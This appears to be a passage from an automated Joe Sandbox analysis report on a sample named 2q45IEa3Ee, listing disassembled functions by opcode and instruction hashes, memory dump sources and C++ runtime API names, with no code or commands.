                                                                                                                                              • Opcode Fuzzy Hash: b63480f97982e7db8a7db3ed45ed25de528528b334b240bae28df31dbf5fed8a
                                                                                                                                              • Instruction Fuzzy Hash: 66515DB251C600AFE705BE58DCC27BAB7E5EF58310F16492DEAC5C3740EA3998508B97
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: n4l
                                                                                                                                              • API String ID: 0-2196554762
                                                                                                                                              • Opcode ID: 2e8b52afe59eb3c5f7f204e0e558b700444c74748f47f7c9f948308ab554a2b3
                                                                                                                                              • Instruction ID: cfb78ddde65dfe299f035fa687c81655ede069aa039c18de83892e97b7b3731e
                                                                                                                                              • Opcode Fuzzy Hash: 2e8b52afe59eb3c5f7f204e0e558b700444c74748f47f7c9f948308ab554a2b3
                                                                                                                                              • Instruction Fuzzy Hash: 40514BF251C6049FE715BF68EC867AAB7E4EB18310F06492DEBD4C7740E635A8108B97
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: iw~
                                                                                                                                              • API String ID: 0-3147449043
                                                                                                                                              • Opcode ID: d3ad3e607f400a0983179f78db946aba614cfe65f9c4e16cf98ed1a3a33ea9ad
                                                                                                                                              • Instruction ID: 73bf55febc2d543ac5f6d76db30ccf38d887afa1da55267f6bd6b8520f9c6164
                                                                                                                                              • Opcode Fuzzy Hash: d3ad3e607f400a0983179f78db946aba614cfe65f9c4e16cf98ed1a3a33ea9ad
                                                                                                                                              • Instruction Fuzzy Hash: B0416DB260C600AFE301AF2ADC8167AFBE6EFD8310F16892DE6C4C3654D6319445CB87
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5fbb21310ebcda3e4e059c5daabd12ca751ce5a75bdd29feff0510c95ec1bd5b
                                                                                                                                              • Instruction ID: 4ca745edaa80a38bd1ad3e4dab5ca5f9ea47327170c71c16be183b0e7fe4541a
                                                                                                                                              • Opcode Fuzzy Hash: 5fbb21310ebcda3e4e059c5daabd12ca751ce5a75bdd29feff0510c95ec1bd5b
                                                                                                                                              • Instruction Fuzzy Hash: BCE10272E1022A9FDF05CFA9D8816ADFBF1AF88314F1942AAD815B7340D770AD45CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 18cf6ee14a928c19aceb8b0ceea583b6c65dc12c3714685dd5220c7fd968dfb7
                                                                                                                                              • Instruction ID: f02cabb86284253cdcad4e7cea16ba1f632d78f95c19707e5148e97740bfee31
                                                                                                                                              • Opcode Fuzzy Hash: 18cf6ee14a928c19aceb8b0ceea583b6c65dc12c3714685dd5220c7fd968dfb7
                                                                                                                                              • Instruction Fuzzy Hash: 6EC1CE719006468FCF28CF68C58C67ABBB1FF05304F244659E8629BA91D732EE45DB92
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                              • Opcode ID: b957ff04310dfbca396339d06a237c3635a64c3c526baa5b7fea4d3ed316a416
                                                                                                                                              • Instruction ID: 9700f1474ab81bdf1778a106cd49041cccc7ef3aee3cd8e5da4e64b348256291
                                                                                                                                              • Opcode Fuzzy Hash: b957ff04310dfbca396339d06a237c3635a64c3c526baa5b7fea4d3ed316a416
                                                                                                                                              • Instruction Fuzzy Hash: C5B129755007039FCB389B65CCC2ABBB3A9EF4271CF14452DEA53C6580EA71EA85D710
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4cb429eb708d24b7a4e843f1b35e9b86c1bda9f15048c603e86bebe55ab5ba3b
                                                                                                                                              • Instruction ID: ea24f3c49a37406ff252fafc4ee190a76c7c66a4277622b0a3e11e10220db012
                                                                                                                                              • Opcode Fuzzy Hash: 4cb429eb708d24b7a4e843f1b35e9b86c1bda9f15048c603e86bebe55ab5ba3b
                                                                                                                                              • Instruction Fuzzy Hash: DAB1723151060ADFE715CF28C49AB657BE0FF4A368F258658E8E9CF2A1C735DA85CB40
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b246dceba23becdf05fa2486c64e3a12a8d32dcdab3ecd57a1777d152a450efa
                                                                                                                                              • Instruction ID: 9f89de370e42d862a1d7e609eb4290a6525790c302a18b6b69003ce9efa90c68
                                                                                                                                              • Opcode Fuzzy Hash: b246dceba23becdf05fa2486c64e3a12a8d32dcdab3ecd57a1777d152a450efa
                                                                                                                                              • Instruction Fuzzy Hash: 7281F0B0E002D69FDB11DF68D9D17FEBBA4FB19304F0401A9D9689B342C7359A09DBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ef33d50e5d2e9dc91fa7e2f80e20fa50a980dca9e599a08aec94699d1a390e76
                                                                                                                                              • Instruction ID: 0cfea4c0d3c329eb7fa5a39311ac0b1c3f951c5b5c3f0e9dfe182f2203d3a7b9
                                                                                                                                              • Opcode Fuzzy Hash: ef33d50e5d2e9dc91fa7e2f80e20fa50a980dca9e599a08aec94699d1a390e76
                                                                                                                                              • Instruction Fuzzy Hash: FD619671A3036B4FD748CF5EECC1826B365A38A311B89461AEA85C7395C636E527C7B0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f438f43319586025c5d8672b94296c539207790536c06181cf5452061014a322
                                                                                                                                              • Instruction ID: f176f46bc16a44bd46548dd1e89f864472abed525bdaeab94da2116b01791728
                                                                                                                                              • Opcode Fuzzy Hash: f438f43319586025c5d8672b94296c539207790536c06181cf5452061014a322
                                                                                                                                              • Instruction Fuzzy Hash: 4551A6B351C314AFE7107E6DEC85AAAFBE8EB19264F16093EE6C4C3740E671580086D7
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7395c8481ce427027ee2a76d8a755f601c767e2e18dbff57413354e373d6c7c4
                                                                                                                                              • Instruction ID: e96c9c9802dbdc24edcc538bc5ed15a914a6c0a0b3e4a4e0090cc0647d88a4cf
                                                                                                                                              • Opcode Fuzzy Hash: 7395c8481ce427027ee2a76d8a755f601c767e2e18dbff57413354e373d6c7c4
                                                                                                                                              • Instruction Fuzzy Hash: E151E4B360C308AFE7017E5DEC8566AFBE9EF94660F06453DE6C083700EA3258048687
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 067dda0ae9e3211b6437c974e2927a7e0369ec643b111a2b8c4aa30f0b1d51fb
                                                                                                                                              • Instruction ID: d22a59a6ae3d2a669f9904a917b470bdc3eadd9282ff1ded8f2e6338c8ee1033
                                                                                                                                              • Opcode Fuzzy Hash: 067dda0ae9e3211b6437c974e2927a7e0369ec643b111a2b8c4aa30f0b1d51fb
                                                                                                                                              • Instruction Fuzzy Hash: EB5195F3618600AFE705AE29DC8577ABBE5EFD8320F06893DE7C8C7744EA3554448692
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 912a8a5fffa24c2ae9d882395de4f35c1c56b7973233ea152345633f0ebb84a5
                                                                                                                                              • Instruction ID: 00daa986159f4128444e9909b30f5eeb3b735070714b57d1b309830f4697349a
                                                                                                                                              • Opcode Fuzzy Hash: 912a8a5fffa24c2ae9d882395de4f35c1c56b7973233ea152345633f0ebb84a5
                                                                                                                                              • Instruction Fuzzy Hash: 685173F2608600AFE341AE5AECC1B7AFBEAFB98650F16452DEAC487700D63558018B57
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 728d17f74aaca090996fb0f8efdadd8db02e7e5fd7f6a71d5ebf3da05e6fe2c6
                                                                                                                                              • Instruction ID: 1ef032f2c8366ab88c2192819e52f6705e82e2a453f6bff226adfc69ed7c6f0e
                                                                                                                                              • Opcode Fuzzy Hash: 728d17f74aaca090996fb0f8efdadd8db02e7e5fd7f6a71d5ebf3da05e6fe2c6
                                                                                                                                              • Instruction Fuzzy Hash: DC518FF260C708AFE7197E19EC81B79F7E4EB48324F06092DE7D583740EA366404868B
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0b3d56d55570aade02fa2ee9b29067041f79bf702115565f60d1f16603737008
                                                                                                                                              • Instruction ID: 69063144348a0ba9951ed21f8e6f5c1073b69ed4ef462309aa735ca4f923e478
                                                                                                                                              • Opcode Fuzzy Hash: 0b3d56d55570aade02fa2ee9b29067041f79bf702115565f60d1f16603737008
                                                                                                                                              • Instruction Fuzzy Hash: FC5149F250C6049FE715BF29EC8677AFBE4EF58710F06492CEAD483740E631A5548A87
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                              • Instruction ID: 2bf9c193a1f54244b72e22448e38303bcf01827ff683d1aafdafbb2c0b5fb8b4
                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                              • Instruction Fuzzy Hash: 04112E7724304343DE04CA3EC4BE5B6A795EBD532172D83F6D8624B754D9229F45B500
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strrchr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                              • Opcode ID: 34bc779386904af94e3a65745d8093cf5441aa8cc4e4cdc27bc5775c85d1135f
                                                                                                                                              • Instruction ID: b7b9629a933cdf12cb5c7b8eaccfd2708f12865feee445fed568c8d8079d2b18
                                                                                                                                              • Opcode Fuzzy Hash: 34bc779386904af94e3a65745d8093cf5441aa8cc4e4cdc27bc5775c85d1135f
                                                                                                                                              • Instruction Fuzzy Hash: 6DB15672D002569FDB11CF64CC81BEEBBA5EF1A318F1C4166F914AF282D674DA01CBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C91B97
                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00C91B9F
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C91C28
                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00C91C53
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C91CA8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                              • String ID: csm
                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                              • Opcode ID: d27a1c9f7f15ce9c7a299ec08ca0dffb8c702e2d8c577d6d840530f8f0d2717d
                                                                                                                                              • Instruction ID: 1e715b73247ab198301e39161e55e6e784a0d27c7e9ce1af0c1b1a35128bddfc
                                                                                                                                              • Opcode Fuzzy Hash: d27a1c9f7f15ce9c7a299ec08ca0dffb8c702e2d8c577d6d840530f8f0d2717d
                                                                                                                                              • Instruction Fuzzy Hash: EB41C631A0024AAFCF10DF69C88AAAEBBA5FF05314F188055EC149B392D771EA15CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C77826
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C77848
                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C77868
                                                                                                                                              • __Getctype.LIBCPMT ref: 00C77911
                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00C77930
                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C77948
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1102183713-0
                                                                                                                                              • Opcode ID: a36b1ca1fdaf6c3f0c80c5039b256940a681bf8176db689b56dbe3e3b50bdcac
                                                                                                                                              • Instruction ID: 562f5389ff572be451ef9bc82a8191295e3d7e58cf6cca6538c6096262637dd0
                                                                                                                                              • Opcode Fuzzy Hash: a36b1ca1fdaf6c3f0c80c5039b256940a681bf8176db689b56dbe3e3b50bdcac
                                                                                                                                              • Instruction Fuzzy Hash: 0541C870D042459FDB14EF54D885B6EFBB4EB10714F248259E819AB391DB30AE44CBE1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66C3E
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66C4D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: at line $, column
                                                                                                                                              • API String ID: 4194217158-191570568
                                                                                                                                              • Opcode ID: 2efa98237a688721be103acc3292386c2ba0223602f43fe9332362b263bbdbc2
                                                                                                                                              • Instruction ID: 8d49d1a49e510b9069e450105ca123844c3e3a126282204c73a8a42894642d95
                                                                                                                                              • Opcode Fuzzy Hash: 2efa98237a688721be103acc3292386c2ba0223602f43fe9332362b263bbdbc2
                                                                                                                                              • Instruction Fuzzy Hash: 3F512471C002049FDB18DB68DD85BAEFBB1EF89304F24825DE415A7392D774AA8097A0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C6470F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                              • API String ID: 2659868963-1866435925
                                                                                                                                              • Opcode ID: cfa37e179e6997c2b2814f5c13c5925f2a62d610da7a1fe9d6153ae887d20d7f
                                                                                                                                              • Instruction ID: c0540890e876ecdc6f9bcedc6a548c520de21bda7aac2a26412fbba159af9fcc
                                                                                                                                              • Opcode Fuzzy Hash: cfa37e179e6997c2b2814f5c13c5925f2a62d610da7a1fe9d6153ae887d20d7f
                                                                                                                                              • Instruction Fuzzy Hash: 8211E7B29107056BC724EF58D841B96B3ECAF25310F04852AF9549B341FB70EA558BA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C8CFC0
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C8CFCB
                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C8D039
                                                                                                                                                • Part of subcall function 00C8D11C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C8D134
                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00C8CFE6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 677527491-0
                                                                                                                                              • Opcode ID: 07e096a35937ff13b2bb5b2dbf6285cbca681d988a2f6ee04de81f28a170c4c9
                                                                                                                                              • Instruction ID: 437a2aacc54a94f7f6479ccd42d98e98167e64070939e8121b1fd39f10f7f779
                                                                                                                                              • Opcode Fuzzy Hash: 07e096a35937ff13b2bb5b2dbf6285cbca681d988a2f6ee04de81f28a170c4c9
                                                                                                                                              • Instruction Fuzzy Hash: 36018F75A002519BCB0AFF20DC8597D7B61BF84754F144009E812973C1CF786E46EBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C669C5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                              • String ID: parse error$ror
                                                                                                                                              • API String ID: 2659868963-4201802366
                                                                                                                                              • Opcode ID: 0711da468fc561708c77a0ec016a98c40ff4fcdab467c598b6cb81523dc48dfd
                                                                                                                                              • Instruction ID: d878314eac875bbe0ab96bbad5d7dffdef7ccc1aac52edcb417df0a16ebbac1d
                                                                                                                                              • Opcode Fuzzy Hash: 0711da468fc561708c77a0ec016a98c40ff4fcdab467c598b6cb81523dc48dfd
                                                                                                                                              • Instruction Fuzzy Hash: 5CB1F071D102489FDB28DF64CC88BADBB71FF49304F148399E4186B792DB74AA84DB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C82F8E
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C82FA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: value
                                                                                                                                              • API String ID: 4194217158-494360628
                                                                                                                                              • Opcode ID: 0c07b7d48f3d65637ed6902f9830c0a27ad9e9415c02de78bc488b6e4d6a325b
                                                                                                                                              • Instruction ID: 809ee18805c7eb69d8822ef6be336138f5ea50621e10bb4b1a7b814156331220
                                                                                                                                              • Opcode Fuzzy Hash: 0c07b7d48f3d65637ed6902f9830c0a27ad9e9415c02de78bc488b6e4d6a325b
                                                                                                                                              • Instruction Fuzzy Hash: 00912370C0024C9BDB15EBA0CD98BEEFBB8BF14304F0081AAE449A7252D7345B89DB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66641
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66650
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: [json.exception.
                                                                                                                                              • API String ID: 4194217158-791563284
                                                                                                                                              • Opcode ID: 57554c9299ddef8cb6d8eebbcf4098b332a067e7986b3db75ea0a9f408211d0a
                                                                                                                                              • Instruction ID: 1defa3be3a6f88d8638abf5e39e7bb01b7c2b042531e92cd71465f3c9fd9afe4
                                                                                                                                              • Opcode Fuzzy Hash: 57554c9299ddef8cb6d8eebbcf4098b332a067e7986b3db75ea0a9f408211d0a
                                                                                                                                              • Instruction Fuzzy Hash: 94615570D002489FDB28DF68DD95BAEBBB4EF45304F24831DF4156B392D7B0AA8497A0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C6470F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                              • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                              • API String ID: 2659868963-1240500531
                                                                                                                                              • Opcode ID: f565496d936fcbc3977e571d09c24ad1cdf309d8316414680a7484686e09d268
                                                                                                                                              • Instruction ID: abc482c6e1281a36159391894200c9105913ca24c752c182fbf29951c82f8e6b
                                                                                                                                              • Opcode Fuzzy Hash: f565496d936fcbc3977e571d09c24ad1cdf309d8316414680a7484686e09d268
                                                                                                                                              • Instruction Fuzzy Hash: 3541F9B1900605AFC718DF58CC81BAEF7B8EF55710F14821EF91597741E770AA41DBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C64141
